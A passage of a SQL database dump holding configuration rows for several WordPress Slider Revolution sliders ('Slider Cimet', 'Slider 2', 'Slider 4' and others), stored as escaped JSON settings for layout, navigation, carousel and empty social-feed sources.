center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.1.6\"}',''),(12,'Slider Cimet','slidercimet','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"slidercimet\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":1200,\"n\":920,\"t\":960,\"m\":820},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#f7f7f7\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.1.6\"}',''),(13,'New Folder','new-folder','',NULL,'folder'),(14,'New Folder 1','new-folder-1','',NULL,'folder'),(15,'Slider 1','slider-1','{}','{\"version\":\"6.1.8\"}',''),(16,'Slider 2','slider-2','{\"addOns\":[],\"version\":\"6.1.8\",\"shortcode\":\"[rev_slider alias=\\\"slider-2\\\"][\\/rev_slider]\",\"type\":\"carousel\",\"layouttype\":\"fullwidth\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":55,\"maxPosts\":30,\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":1200,\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":300,\"delay\":9000,\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":10000,\"ease\":\"Linear.easeNone\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":false,\"t\":false,\"m\":false},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":0,\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1240,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":900,\"n\":768,\"t\":960,\"m\":720},\"editorCache\":{\"d\":900,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"maxOpacity\":100,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":800,\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":\"false\"},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":0,\"dottedOverlay\":\"none\",\"shadow\":0,\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#ffffff\",\"type\":\"0\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":0,\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":1,\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false},\"progressbar\":{\"set\":false,\"height\":5,\"position\":\"bottom\",\"color\":\"rgba(255,255,255,0.5)\"},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":1},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":50,\"height\":100},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":\"off\",\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":\"1000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"2000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"4000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"3000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":0,\"offsetY\":20,\"align\":\"slider\",\"space\":5,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":0,\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[5,10,15,20,25,30,35,40,45,46,47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":0,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slidercenter\",\"type\":\"scroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\"},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":10,\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":30},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"Linear.easeNone\",\"speed\":500},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\"},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\"},{\"alias\":\"Content Text\",\"v\":\"#00ffff\"}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"slider-2\\\"][\\/rev_slider]\"}','{\"version\":\"6.1.8\"}',''),(17,'Slider 3','slider-3','{}','{\"version\":\"6.1.8\"}',''),(18,'Slider 4','slider-4','{\"addOns\":[],\"version\":\"6.1.8\",\"shortcode\":\"[rev_slider alias=\\\"slider-4\\\"][\\/rev_slider]\",\"type\":\"carousel\",\"layouttype\":\"auto\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":55,\"maxPosts\":30,\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":1200,\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":300,\"delay\":9000,\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":10000,\"ease\":\"Linear.easeNone\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":false,\"t\":false,\"m\":false},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":0,\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1240,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":\"600px\",\"n\":768,\"t\":960,\"m\":720},\"editorCache\":{\"d\":600,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"maxOpacity\":100,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":\"200ms\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":\"false\"},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":0,\"dottedOverlay\":\"none\",\"shadow\":0,\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center 